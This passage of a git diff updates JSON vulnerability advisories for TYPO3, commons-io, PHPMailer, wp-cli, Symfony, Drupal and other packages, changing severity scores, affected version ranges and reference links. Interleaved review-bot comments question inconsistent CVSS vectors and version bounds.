@@ -69,6 +145,14 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-21358" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms-core/CVE-2021-21358.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms/CVE-2021-21358.yaml" + }, { "type": "WEB", "url": "https://packagist.org/packages/typo3/cms-form" diff --git a/advisories/github-reviewed/2021/03/GHSA-x7hc-x7fm-f7qh/GHSA-x7hc-x7fm-f7qh.json b/advisories/github-reviewed/2021/03/GHSA-x7hc-x7fm-f7qh/GHSA-x7hc-x7fm-f7qh.json index 6d78d15294e33..70aec0587772f 100644 --- a/advisories/github-reviewed/2021/03/GHSA-x7hc-x7fm-f7qh/GHSA-x7hc-x7fm-f7qh.json +++ b/advisories/github-reviewed/2021/03/GHSA-x7hc-x7fm-f7qh/GHSA-x7hc-x7fm-f7qh.json 
@@ -1,15 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-x7hc-x7fm-f7qh", - "modified": "2021-03-23T01:42:20Z", + "modified": "2024-02-02T16:44:14Z", "published": "2021-03-23T01:54:17Z", "aliases": [ "CVE-2021-21370" ], "summary": "Cross-Site Scripting in Content Preview (CType menu)", - "details": "> ### Meta\n> * CVSS: `AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:L/A:N/E:F/RL:O/RC:C` (4.1)\n> * CWE-79\n> * Status: **DRAFT**\n\n### Problem\nIt has been discovered that content elements of type _menu_ are vulnerable to cross-site scripting when their referenced items get previewed in the page module. A valid backend user account is needed to exploit this vulnerability.\n\n### Solution\nUpdate to TYPO3 versions 7.6.51, 8.7.40, 9.5.25, 10.4.14, 11.1.1 that fix the problem described.\n\n### Credits\nThanks to TYPO3 contributor Oliver Bartsch who reported and fixed the issue.\n\n### References\n* [TYPO3-CORE-SA-2021-008](https://typo3.org/security/advisory/typo3-core-sa-2021-008)", + "details": "### Problem\nIt has been discovered that content elements of type _menu_ are vulnerable to cross-site scripting when their referenced items get previewed in the page module. A valid backend user account is needed to exploit this vulnerability.\n\n### Solution\nUpdate to TYPO3 versions 7.6.51, 8.7.40, 9.5.25, 10.4.14, 11.1.1 that fix the problem described.\n\n### Credits\nThanks to TYPO3 contributor Oliver Bartsch who reported and fixed the issue.\n\n### References\n* [TYPO3-CORE-SA-2021-008](https://typo3.org/security/advisory/typo3-core-sa-2021-008)", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + } ], "affected": [ { 
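Review bot: The new structured severity vector `CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N` does not match the vendor vector the removed Meta block carried, `AV:N/AC:H/PR:L/UI:R/S:C/C:L/I:L/A:N` (4.1): attack complexity was High in TYPO3's rating and is Low here. Adopting a third-party score instead of the vendor's is a legitimate policy choice, but the sibling advisory GHSA-fjh3-g8gq-9q92 in this same commit was converted with a vector that matches its own removed Meta block, so this one looks like a copy of that vector rather than a conversion of CVE-2021-21370's. Either restore `AC:H` or add the source of the new vector to `references`; the `severity` string bump to MODERATE later in the file should then follow from whichever vector is kept.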
@@ -121,6 +124,120 @@ "database_specific": { "last_known_affected_version_range": "<= 11.1.0" } + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "10.0.0" + }, + { + "fixed": "10.4.14" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "11.0.0" + }, + { + "fixed": "11.1.1" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "9.0.0" + }, + { + "fixed": "9.5.25" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "10.0.0" + }, + { + "fixed": "10.4.14" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "11.0.0" + }, + { + "fixed": "11.1.1" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "9.0.0" + }, + { + "fixed": "9.5.25" + } + ] + } + ] } ], "references": [ @@ -132,6 +249,14 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-21370" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms-core/CVE-2021-21370.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/typo3/cms/CVE-2021-21370.yaml" + }, { "type": "WEB", "url": "https://packagist.org/packages/typo3/cms-backend" 
@@ -145,7 +270,7 @@ "cwe_ids": [ "CWE-79" ], - "severity": "LOW", + "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2021-03-23T01:42:20Z", "nvd_published_at": "2021-03-23T02:15:00Z" diff --git a/advisories/github-reviewed/2021/04/GHSA-4hjq-422q-4vpx/GHSA-4hjq-422q-4vpx.json b/advisories/github-reviewed/2021/04/GHSA-4hjq-422q-4vpx/GHSA-4hjq-422q-4vpx.json index 2a2c1360b7ffa..c93a90b3deb84 100644 --- a/advisories/github-reviewed/2021/04/GHSA-4hjq-422q-4vpx/GHSA-4hjq-422q-4vpx.json +++ b/advisories/github-reviewed/2021/04/GHSA-4hjq-422q-4vpx/GHSA-4hjq-422q-4vpx.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-4hjq-422q-4vpx", - "modified": "2022-08-10T23:35:31Z", + "modified": "2024-02-05T11:00:10Z", "published": "2021-04-06T17:20:58Z", "aliases": [ "CVE-2021-27908" @@ -44,6 +44,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-27908" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/mautic/core/CVE-2021-27908.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/mautic/mautic" diff --git a/advisories/github-reviewed/2021/04/GHSA-gwrp-pvrq-jmwv/GHSA-gwrp-pvrq-jmwv.json b/advisories/github-reviewed/2021/04/GHSA-gwrp-pvrq-jmwv/GHSA-gwrp-pvrq-jmwv.json index adc9b8795d14b..d2faf0fb5c7d2 100644 --- a/advisories/github-reviewed/2021/04/GHSA-gwrp-pvrq-jmwv/GHSA-gwrp-pvrq-jmwv.json +++ b/advisories/github-reviewed/2021/04/GHSA-gwrp-pvrq-jmwv/GHSA-gwrp-pvrq-jmwv.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-gwrp-pvrq-jmwv", - "modified": "2022-02-08T21:31:42Z", + "modified": "2024-02-09T03:22:15Z", "published": "2021-04-26T16:04:00Z", "aliases": [ "CVE-2021-29425" @@ -11,7 +11,7 @@ "severity": [ { "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N" } ], "affected": [ 
@@ -33,6 +33,177 @@ ] } ] + }, + { + "package": { + "ecosystem": "Maven", + "name": "com.cosium.vet:vet" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.0" + }, + { + "last_affected": "3.22" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Maven", + "name": "com.diamondq.common:common-thirdparty.jcasbin" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.4.0" + }, + { + "last_affected": "1.4.0" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Maven", + "name": "com.liferay:com.liferay.sass.compiler.jsass" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.0.1" + }, + { + "last_affected": "1.0.1" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Maven", + "name": "com.virjar:ratel-api" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.0.0" + }, + { + "last_affected": "1.3.6" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Maven", + "name": "net.hasor:cobble-lang" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.4.1" + }, + { + "last_affected": "4.6.2" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Maven", + "name": "org.apache.commons:commons-io" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.3.2" + }, + { + "last_affected": "1.3.2" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Maven", + "name": "org.apache.servicemix.bundles:org.apache.servicemix.bundles.commons-io" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.4_3" + }, + { + "last_affected": "1.4_3" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Maven", + "name": "org.checkerframework.annotatedlib:commons-io" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "2.6" + }, + { + "fixed": "2.7" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Maven", + "name": 
"org.smartboot.servlet:servlet-core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.1.9" + }, + { + "last_affected": "0.6" + } + ] + } + ] } ], "references": [ @@ -227,6 +398,14 @@ { "type": "WEB", "url": "https://www.oracle.com/security-alerts/cpuoct2021.html" + }, + { + "type": "EVIDENCE", + "url": "https://github.com/jensdietrich/xshady-release/tree/main/CVE-2021-29425" + }, + { + "type": "WEB", + "url": "https://arxiv.org/pdf/2306.05534.pdf" } ], "database_specific": { @@ -239,4 +418,4 @@ "github_reviewed_at": "2021-04-26T15:21:31Z", "nvd_published_at": "2021-04-13T07:15:00Z" } -} \ No newline at end of file +} diff --git a/advisories/github-reviewed/2021/04/GHSA-vf4w-fg7r-5v94/GHSA-vf4w-fg7r-5v94.json b/advisories/github-reviewed/2021/04/GHSA-vf4w-fg7r-5v94/GHSA-vf4w-fg7r-5v94.json index 11db4bb7c4b85..0a2ee58ea1e0a 100644 --- a/advisories/github-reviewed/2021/04/GHSA-vf4w-fg7r-5v94/GHSA-vf4w-fg7r-5v94.json +++ b/advisories/github-reviewed/2021/04/GHSA-vf4w-fg7r-5v94/GHSA-vf4w-fg7r-5v94.json @@ -63,6 +63,10 @@ "type": "WEB", "url": "https://github.com/phpseclib/phpseclib/pull/1635" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/phpseclib/phpseclib/CVE-2021-30130.yaml" + }, { "type": "WEB", "url": "https://github.com/phpseclib/phpseclib/releases/tag/2.0.31" diff --git a/advisories/github-reviewed/2021/05/GHSA-4mqv-gcr3-pff9/GHSA-4mqv-gcr3-pff9.json b/advisories/github-reviewed/2021/05/GHSA-4mqv-gcr3-pff9/GHSA-4mqv-gcr3-pff9.json index d2299a4c5b3a9..61333994b0936 100644 --- a/advisories/github-reviewed/2021/05/GHSA-4mqv-gcr3-pff9/GHSA-4mqv-gcr3-pff9.json +++ b/advisories/github-reviewed/2021/05/GHSA-4mqv-gcr3-pff9/GHSA-4mqv-gcr3-pff9.json 
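Review bot: Every bundling-artifact entry added in the `@@ -33,6 +33,177 @@` hunk (`com.cosium.vet:vet`, `com.diamondq.common:common-thirdparty.jcasbin`, `com.virjar:ratel-api`, `net.hasor:cobble-lang`, `org.smartboot.servlet:servlet-core`, and others) closes its range with `last_affected` rather than `fixed`, so scanners will treat every release after the named version as unaffected even though nothing in the diff shows those projects re-bundled a commons-io at or above 2.7. If each `last_affected` is simply the newest release examined by the EVIDENCE/arXiv references added in the `@@ -227,6 +398,14 @@` hunk rather than a verified last vulnerable release, a later release that still shades the old commons-io will be missed. It would help to record in `database_specific` or the commit message how the `last_affected` values were derived, and to revisit them once an upstream re-bundle is confirmed. The `org.checkerframework.annotatedlib:commons-io` entry is the only one with a `fixed` event and reads consistently with the upstream 2.7 fix.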
@@ -40,10 +40,18 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-7776" }, + { + "type": "WEB", + "url": "https://github.com/PHPOffice/PhpSpreadsheet/pull/1719" + }, { "type": "WEB", "url": "https://github.com/PHPOffice/PhpSpreadsheet/commit/0ed5b800be2136bcb8fa9c1bdf59abc957a98845" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/phpoffice/phpspreadsheet/CVE-2020-7776.yaml" + }, { "type": "WEB", "url": "https://github.com/PHPOffice/PhpSpreadsheet/blob/master/src/PhpSpreadsheet/Writer/Html.php%23L1792" diff --git a/advisories/github-reviewed/2021/05/GHSA-m298-fh5c-jc66/GHSA-m298-fh5c-jc66.json b/advisories/github-reviewed/2021/05/GHSA-m298-fh5c-jc66/GHSA-m298-fh5c-jc66.json index 02f7f42615e20..5f1b3e2b143b3 100644 --- a/advisories/github-reviewed/2021/05/GHSA-m298-fh5c-jc66/GHSA-m298-fh5c-jc66.json +++ b/advisories/github-reviewed/2021/05/GHSA-m298-fh5c-jc66/GHSA-m298-fh5c-jc66.json @@ -48,6 +48,14 @@ "type": "WEB", "url": "https://github.com/PHPMailer/PHPMailer/commit/e2e07a355ee8ff36aba21d0242c5950c56e4c6f9" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/phpmailer/phpmailer/CVE-2020-36326.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/PHPMailer/PHPMailer/releases/tag/v6.4.1" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3B5WDPGUFNPG4NAZ6G4BZX43BKLAVA5B/" diff --git a/advisories/github-reviewed/2021/05/GHSA-rwgm-f83r-v3qj/GHSA-rwgm-f83r-v3qj.json b/advisories/github-reviewed/2021/05/GHSA-rwgm-f83r-v3qj/GHSA-rwgm-f83r-v3qj.json index a1b9733c185fa..069d876684664 100644 --- a/advisories/github-reviewed/2021/05/GHSA-rwgm-f83r-v3qj/GHSA-rwgm-f83r-v3qj.json +++ b/advisories/github-reviewed/2021/05/GHSA-rwgm-f83r-v3qj/GHSA-rwgm-f83r-v3qj.json 
@@ -25,7 +25,7 @@
 "type": "ECOSYSTEM",
 "events": [
 {
- "introduced": "0"
+ "introduced": "0.12.0"
 },
 {
 "fixed": "2.5.0"
@@ -67,6 +67,10 @@
 {
 "type": "WEB",
 "url": "https://github.com/wp-cli/wp-cli/pull/5523"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/wp-cli/wp-cli/CVE-2021-29504.yaml"
 }
 ],
 "database_specific": {
diff --git a/advisories/github-reviewed/2021/06/GHSA-77mr-wc79-m8j3/GHSA-77mr-wc79-m8j3.json b/advisories/github-reviewed/2021/06/GHSA-77mr-wc79-m8j3/GHSA-77mr-wc79-m8j3.json
index 4d151e1f171d1..f09ea3fdc63a0 100644
--- a/advisories/github-reviewed/2021/06/GHSA-77mr-wc79-m8j3/GHSA-77mr-wc79-m8j3.json
+++ b/advisories/github-reviewed/2021/06/GHSA-77mr-wc79-m8j3/GHSA-77mr-wc79-m8j3.json
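Review bot: Raising `introduced` from `"0"` to `"0.12.0"` declares every wp-cli release before 0.12.0 unaffected by CVE-2021-29504, yet nothing in the diff records why that boundary was chosen; if it was copied from the FriendsOfPHP entry added as a reference in the next hunk, saying so in the commit would let the next reviewer verify it instead of re-deriving it. The same narrowing (`"0"` → `"3.0.0"`) appears in the `@@ -30,7 +30,7 @@` hunk of GHSA-9r2w-394v-53qc further down. A narrowed `introduced` is only safe when the vulnerable code demonstrably did not exist before that version; otherwise `"0"` is the conservative value.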
@@ -1,15 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-77mr-wc79-m8j3", - "modified": "2021-10-21T13:23:23Z", + "modified": "2024-02-07T18:16:24Z", "published": "2021-06-22T15:18:02Z", "aliases": [ "CVE-2021-3603" ], - "summary": "A validation function with the same name as a built-in validator can be called", + "summary": "PHPMailer untrusted code may be run from an overridden address validator", "details": "If a function is defined that has the same name as the default built-in email address validation scheme (`php`), it will be called in default configuration as when no validation scheme is provided, the default scheme's callable `php` was being called. If an attacker is able to inject such a function into the application (a much bigger issue), it will be called whenever an email address is validated, such as when calling `validateAddress()`.\n\n### Impact\nLow impact – exploitation requires that an attacker can already inject code into an application, but it provides a trigger pathway.\n\n### Patches\nThis is patched in PHPMailer 6.5.0 by denying the use of simple strings as validator function names, which is a very minor BC break.\n\n### Workarounds\nInject your own email validator function.\n\n### References\nReported by [Vikrant Singh Chauhan](mailto:vi@hackberry.xyz) via [huntr.dev](https://www.huntr.dev/).\n[CVE-2021-3603](https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-3603)\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [the PHPMailer project](https://github.com/PHPMailer/PHPMailer)\n* [Email us](mailto:phpmailer@synchromedia.co.uk).\n", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ { 
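Review bot: The new `severity` vector `CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H` (and the `LOW` → `HIGH` change in the `@@ -60,9 +79,10 @@` hunk of the same file) contradicts the advisory's own `details`, which say exploitation "requires that an attacker can already inject code into an application" and describe the impact as low. A vector with `PR:N` and full C/I/A impact scores the consequence of that pre-existing code injection, not of this issue, which the maintainers call a trigger pathway only. If the HIGH rating is NVD's assessment being adopted, that should be stated and the `details` reconciled with it; otherwise a vector that models the precondition (for example a higher `PR` value) would fit the text better. The rewritten summary `PHPMailer untrusted code may be run from an overridden address validator` also reads as if untrusted input alone triggers execution, which the details do not support.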
@@ -45,10 +48,26 @@ "type": "WEB", "url": "https://github.com/PHPMailer/PHPMailer/commit/45f3c18dc6a2de1cb1bf49b9b249a9ee36a5f7f3" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/phpmailer/phpmailer/CVE-2021-3603.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/PHPMailer/PHPMailer" }, + { + "type": "WEB", + "url": "https://github.com/PHPMailer/PHPMailer/releases/tag/v6.5.0" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/3YRMWGA4VTMXFB22KICMB7YMFZNFV3EJ/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/FJYSOFCUBS67J3TKR74SD3C454N7VTYM/" + }, { "type": "WEB", "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-3603" @@ -60,9 +79,10 @@ ], "database_specific": { "cwe_ids": [ - "CWE-74" + "CWE-74", + "CWE-829" ], - "severity": "LOW", + "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2021-06-16T19:49:12Z", "nvd_published_at": "2021-06-17T12:15:00Z" diff --git a/advisories/github-reviewed/2021/06/GHSA-7q44-r25x-wm4q/GHSA-7q44-r25x-wm4q.json b/advisories/github-reviewed/2021/06/GHSA-7q44-r25x-wm4q/GHSA-7q44-r25x-wm4q.json index 3065e4b7298c6..1f7b9733d4f5d 100644 --- a/advisories/github-reviewed/2021/06/GHSA-7q44-r25x-wm4q/GHSA-7q44-r25x-wm4q.json +++ b/advisories/github-reviewed/2021/06/GHSA-7q44-r25x-wm4q/GHSA-7q44-r25x-wm4q.json 
@@ -48,10 +48,18 @@ "type": "WEB", "url": "https://github.com/PHPMailer/PHPMailer/commit/acd264bf17ff4ac5c915f0d4226dce8a9ea70bc3" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/phpmailer/phpmailer/CVE-2021-34551.yaml" + }, { "type": "WEB", "url": "https://github.com/PHPMailer/PHPMailer/blob/master/SECURITY.md" }, + { + "type": "WEB", + "url": "https://github.com/PHPMailer/PHPMailer/releases/tag/v6.5.0" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/3YRMWGA4VTMXFB22KICMB7YMFZNFV3EJ/" diff --git a/advisories/github-reviewed/2021/06/GHSA-9f46-5r25-5wfm/GHSA-9f46-5r25-5wfm.json b/advisories/github-reviewed/2021/06/GHSA-9f46-5r25-5wfm/GHSA-9f46-5r25-5wfm.json index de368e480aaf7..7281a7c881a70 100644 --- a/advisories/github-reviewed/2021/06/GHSA-9f46-5r25-5wfm/GHSA-9f46-5r25-5wfm.json +++ b/advisories/github-reviewed/2021/06/GHSA-9f46-5r25-5wfm/GHSA-9f46-5r25-5wfm.json @@ -71,6 +71,10 @@ "type": "WEB", "url": "https://github.com/thephpleague/flysystem/commit/f3ad69181b8afed2c9edf7be5a2918144ff4ea32" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/league/flysystem/CVE-2021-32708.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/thephpleague/flysystem" diff --git a/advisories/github-reviewed/2021/06/GHSA-m5vx-8chx-qvmm/GHSA-m5vx-8chx-qvmm.json b/advisories/github-reviewed/2021/06/GHSA-m5vx-8chx-qvmm/GHSA-m5vx-8chx-qvmm.json index dbd43d3e4329b..3d26a17efaff8 100644 --- a/advisories/github-reviewed/2021/06/GHSA-m5vx-8chx-qvmm/GHSA-m5vx-8chx-qvmm.json +++ b/advisories/github-reviewed/2021/06/GHSA-m5vx-8chx-qvmm/GHSA-m5vx-8chx-qvmm.json 
@@ -94,6 +94,10 @@ "type": "WEB", "url": "https://github.com/neos/form/commit/69de4219b1f58157e2be6b05811463875d75c246" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/neos/form/CVE-2021-32697.yaml" + }, { "type": "WEB", "url": "https://github.com/neos/form/releases/tag/5.1.3" diff --git a/advisories/github-reviewed/2021/06/GHSA-mg2g-8pwj-r2j2/GHSA-mg2g-8pwj-r2j2.json b/advisories/github-reviewed/2021/06/GHSA-mg2g-8pwj-r2j2/GHSA-mg2g-8pwj-r2j2.json index a07f7603fe3e7..46be45c143e90 100644 --- a/advisories/github-reviewed/2021/06/GHSA-mg2g-8pwj-r2j2/GHSA-mg2g-8pwj-r2j2.json +++ b/advisories/github-reviewed/2021/06/GHSA-mg2g-8pwj-r2j2/GHSA-mg2g-8pwj-r2j2.json @@ -25,16 +25,13 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "4.0.0-alpha1" + "introduced": "3.0.0" }, { - "fixed": "4.0.0-alpha2" + "fixed": "3.5.0" } ] } - ], - "versions": [ - "4.0.0-alpha1" ] }, { @@ -47,10 +44,10 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "3.0.0" + "introduced": "4.0.0-alpha1" }, { - "fixed": "3.5.0" + "fixed": "4.0.0-alpha2" } ] } @@ -66,6 +63,10 @@ "type": "WEB", "url": "https://forum.silverstripe.org/c/releases" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/silverstripe/graphql/CVE-2020-26136.yaml" + }, { "type": "WEB", "url": "https://www.silverstripe.org/blog/tag/release" diff --git a/advisories/github-reviewed/2021/06/GHSA-rfcf-m67m-jcrq/GHSA-rfcf-m67m-jcrq.json b/advisories/github-reviewed/2021/06/GHSA-rfcf-m67m-jcrq/GHSA-rfcf-m67m-jcrq.json index 76f57a4f892a0..cbcafa7c4524a 100644 --- a/advisories/github-reviewed/2021/06/GHSA-rfcf-m67m-jcrq/GHSA-rfcf-m67m-jcrq.json +++ b/advisories/github-reviewed/2021/06/GHSA-rfcf-m67m-jcrq/GHSA-rfcf-m67m-jcrq.json 
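Review bot: Dropping `"versions": ["4.0.0-alpha1"]` from the silverstripe/graphql entry in the `@@ -25,16 +25,13 @@` hunk leaves matching of that pre-release entirely to the range comparison `4.0.0-alpha1 <= v < 4.0.0-alpha2`; consumers that do not order pre-release identifiers per semver, or that strip the `-alpha` suffix, may then fail to flag 4.0.0-alpha1 at all, which the explicit list used to guarantee. If the removal is a normalisation to match the other entries, I would still keep the `versions` array for a pre-release-only range. The swap of the 3.x and 4.0.0-alpha ranges between the two entries (this hunk and `@@ -47,10 +44,10 @@`) is purely cosmetic, so the file ends with the same two ranges in reversed order.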
@@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-rfcf-m67m-jcrq", - "modified": "2021-10-21T13:55:20Z", + "modified": "2024-02-05T11:13:38Z", "published": "2021-06-21T17:03:44Z", "aliases": [ "CVE-2021-32693" @@ -33,6 +33,25 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "symfony/symfony" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "5.3.0" + }, + { + "fixed": "5.3.2" + } + ] + } + ] } ], "references": [ @@ -52,6 +71,14 @@ "type": "WEB", "url": "https://github.com/symfony/symfony/commit/3084764ad82f29dbb025df19978b9cbc3ab34728" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/security-http/CVE-2021-32693.yaml" + }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/symfony/CVE-2021-32693.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/symfony/security-http" @@ -59,13 +86,17 @@ { "type": "WEB", "url": "https://symfony.com/blog/cve-2021-32693-authentication-granted-to-all-firewalls-instead-of-just-one" + }, + { + "type": "WEB", + "url": "https://symfony.com/cve-2021-32693" } ], "database_specific": { "cwe_ids": [ "CWE-287" ], - "severity": "HIGH", + "severity": "MODERATE", "github_reviewed": true, "github_reviewed_at": "2021-06-18T20:33:08Z", "nvd_published_at": "2021-06-17T23:15:00Z" diff --git a/advisories/github-reviewed/2021/06/GHSA-rgx6-rjj4-c388/GHSA-rgx6-rjj4-c388.json b/advisories/github-reviewed/2021/06/GHSA-rgx6-rjj4-c388/GHSA-rgx6-rjj4-c388.json index 7b53caeb03fe1..a471176619db5 100644 --- a/advisories/github-reviewed/2021/06/GHSA-rgx6-rjj4-c388/GHSA-rgx6-rjj4-c388.json +++ b/advisories/github-reviewed/2021/06/GHSA-rgx6-rjj4-c388/GHSA-rgx6-rjj4-c388.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-rgx6-rjj4-c388", - "modified": "2023-10-19T19:21:05Z", + "modified": "2024-02-08T09:40:35Z", "published": "2021-06-21T17:16:42Z", "aliases": [ "CVE-2021-33829" 
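Review bot: `severity` drops from `HIGH` to `MODERATE` in the `@@ -59,13 +86,17 @@` hunk without any change to the file's `severity` CVSS array, which lies outside the visible hunks; if that array still carries a HIGH-range vector, the two fields now disagree. CVE-2021-32693 is an authentication issue ("authentication granted to all firewalls instead of just one", per the referenced blog title), so a downgrade deserves a stated rationale in the commit. The new `symfony/symfony` 5.3.0–5.3.2 entry itself is consistent with the `symfony/symfony` FriendsOfPHP reference added in the `@@ -52,6 +71,14 @@` hunk.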
@@ -33,6 +33,158 @@ ] } ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "drupal/core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "7.0.0" + }, + { + "fixed": "7.80" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "drupal/core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "8.0.0" + }, + { + "fixed": "8.9.16" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "drupal/core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "9.0.0" + }, + { + "fixed": "9.0.14" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "drupal/core" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "9.1.0" + }, + { + "fixed": "9.1.9" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "drupal/drupal" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "7.0.0" + }, + { + "fixed": "7.80" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "drupal/drupal" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "8.0.0" + }, + { + "fixed": "8.9.16" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "drupal/drupal" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "9.0.0" + }, + { + "fixed": "9.0.14" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "drupal/drupal" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "9.1.0" + }, + { + "fixed": "9.1.9" + } + ] + } + ] } ], "references": [ 
